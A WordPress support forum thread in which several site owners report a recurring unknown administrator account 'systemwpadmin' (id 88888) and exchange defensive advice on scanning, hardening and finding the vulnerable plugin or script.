WordPress.org

Ready to get started?Download WordPress

Forums

Unknown user "systemwpadmin" (17 posts)

  1. cgw
    Member
    Posted 2 years ago #

    I have an up-to-date installation, having rebuilt it from scratch after a hack last May on a new server and IP, and adding several security plug-ins based on recommendations in the forum and documentation: the site is pretty well locked down.

    Simple login log has recorded a number of unsuccessful brute force attempts to login as "admin" but it also records a successful log-in by "systemwpadmin" with a id88888 and a Russian IP. I can't tell whether the access was at admin level or not, and have spent hours looking for any clues as to what may have been changed: core files and template (artisteer) seem fine and there seems no trace otherwise of a hack. The database doesn't seem to have any base64_, eval or strrev strings anywhere but I would like to know if there is a good method to scan the database for hacking attempts.

    A google search indicates the same username has apparently attacked other sites but there is no follow-up information.

    I would welcome any suggestions as to what may have been tampered with, or how best to proceed as I am somewhat frustrated and disheartened.

    Many thanks in anticipation.

    ps. I can't really add htaccess to wp-admin as I will need to give access to several authors/editors

  2. Krishna
    Volunteer Moderator
    Posted 2 years ago #

    Perhaps you need to go through: codex.wordpress.org/Hardening_WordPress

  3. cgw
    Member
    Posted 2 years ago #

    'fraid I've been already there, and done it all after the hack two months ago.

    What I'm seeking is suggestions on how to find out if the site is now compromised, and how to track down what the vulnerability was likely to be.

    Suggestions as to how to proceed please!

  4. Krishna
    Volunteer Moderator
    Posted 2 years ago #

    Here is one of the tools you can use: http://sitecheck.sucuri.net/scanner/
    If you have an account with Google Webmaster tools, make it a habit to check if Google reports malware (see this).

    There are several other tools to check hacking, malware, etc.

  5. cgw
    Member
    Posted 2 years ago #

    Thanks.

    Sucuri and several other scanners show nothing but I have found a hidden post with author id of 88888 in the database which disappeared as soon as I tried to investigate. I also managed to confirm that the log-in was at administrator level. Very worrying that they were able to log straight in without any failed attempts.

    Another recent report I found using the same user name managed to delete template files, so I have to assume as I have a pretty hardened installation that there is a weakness somewhere either in the core or a plugin (which include several security ones!)

    I'll leave everything alone for a few days to see if there are any other reports that might throw any more light on what's happening. There's certainly no point rebuilding or continuing with the website without having some clue how to stop it happening again.

    Many thanks for your suggestions. Even if we can't solve it now, this thread might help someone else in the future.

  6. mvandemar
    Member
    Posted 2 years ago #

    @cgw - I am cleaning a site now that has the same issues, and the malicious admin was, I am sure, added back when the site was originally hacked. If you like I would be happy to scan the site for you and see what, if anything, was missed in either the files or the database. Feel free to hit me up at michael at endless poetry dot com (no spaces).

  7. jehzlau
    Member
    Posted 1 year ago #

    This is creepy. I also noticed that a systemwpadmin user was created in my freshly installed wordpress blog. >__<.

    I just reinstalled it again and change all my passwords again and my e-mail and after a few months, the systemwpadmin was created again. But nothing was hacked. My themes weren't modified, and my database was clean.

  8. cgw
    Member
    Posted 1 year ago #

    And even more creepy - my site has just been accessed by systemwpadmin just one hour ago with user id 88888. I haven't had time to investigate yet.

    Need to check database - last time this happened I think I found systemwpadmin as a user. Will try to take a look later today.

    As you have a clean install, did you have any plug-ins running? I originally wondered if it was one of my plug-ins that had a vunerability. The theme I'm using was created with Artisteer.

  9. mow_bell
    Member
    Posted 1 year ago #

    My case:
    I found users with id> 88888

    Any news?

  10. itpixie
    Member
    Posted 1 year ago #

    I've been researching this issue as well, and have been posting some stuff on this other thread:
    http://wordpress.org/support/topic/unknown-logged-in-successfully-as-systemwpadmin

    The current theory is that the attacker is able to remotely create an admin level user, logs into the site, does his thing (in my case, tried changing some files via the theme editor), then logs out and delete himself from the database.

    I have not completely figured out how that was being done. Someone suggested that script injections via outdated Timthumb allowed some kind of user creation script to be added to the site. So you might want to scan your site for any file changes, if you haven't done that already. Wordfence does a good job pointing out discrepancies between your files versus WP's original distribution. Check your theme's functions.php for suspicious stuff too.

    A few other things I did seems to help keep the phantom user at bay:

    1. updated the salt values in wp-config.php
    2. updated my WP database password
    3. got rid of any unused themes and plugins -- I suspect some kind of user creation script might have been added there in my case
    4. I use Wordfence to get alerted when admin level users login so I can better monitor who's accessing the site.
    5. Ultimate Security Checker scans for malicious stuff in post and comments too, if you need a scanner for that.

    Will update if I find additional information.

  11. cgw
    Member
    Posted 1 year ago #

    To mow_bell and itpixie

    Thanks for your posts. Yes, my mystery user had id of 88888. Need to look at itpixie's thoughts about Timthumb but don't think it applies to my site (but will double check). This definitely needs to be sorted!

    Could you please both confirm whether or not you use Artisteer as I would like to eliminate that so we can concentrate on the core which is where I think the problem lies. It would also be good to know which host you use in case that is a common factor.

  12. cgw
    Member
    Posted 1 year ago #

    ... and just checked with Timthumb does not exist on my server

  13. itpixie
    Member
    Posted 1 year ago #

    @cgw -- thanks for the additional info here and on the other thread. I have added some update over at the other thread.

    To answer your questions, my site-in-question is on GoDaddy and no, it doesn't use Artisteer.

    Other than TimThumb, there are other "upload" scripts that can be dangerous, especially if they are outdated. Uploadify is another one you should check your themes/plugins for.

    wpsecure.net keeps database of vulnerable WP themes and plugins, you might want to cross-reference your stuff with that list.

  14. mow_bell
    Member
    Posted 1 year ago #

    @cgw and itpixie, thanks for your replys
    My site is on GoDaddy too, I do not use Artisteer, nor Uploadify, nor plugin related to upload files.

    I use Timthumb Scanner "No instances of timthumb were found on your server."

    My themes are custom html, without use templates nor functions nor template tags, absolute nothing related to traditional themes.

    I use wordpress for backend, with multisite installation, with nofollow meta on header, all sites have login required are private sites, and I use that plugins:

    Adminimize
    Members
    Ultimate Taxonomy Manager
    Revision Control
    JSON API
    Email Login

  15. Rick van Koert
    Member
    Posted 1 year ago #

    Godaddy user here too.

    Found a file floating suddenly under WP root that was modified 2 days ago. My backup doesn't show the file, so I yanked it and WP still works. Got worried and found the same guy as admin "systemwpadmin" with a id88888.

    No idea what to do next. Think I'll just kill WP off my site forget all about it and move back to my IPB forum.

    File modified was wp-functions, located under the wordpress root folder.

  16. Andrew
    Forum Moderator
    Posted 1 year ago #

    Rick van Koert,
    For support on your own issue, create your own thread.

  17. cgw
    Member
    Posted 1 year ago #

    Rick,

    Many thanks for your info - very much appreciated. Yes, like you, I find this problem very disheartening but I am hoping that with enough information, we will discover where the vulnerability lies. I'll check my own site for wp-functions.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.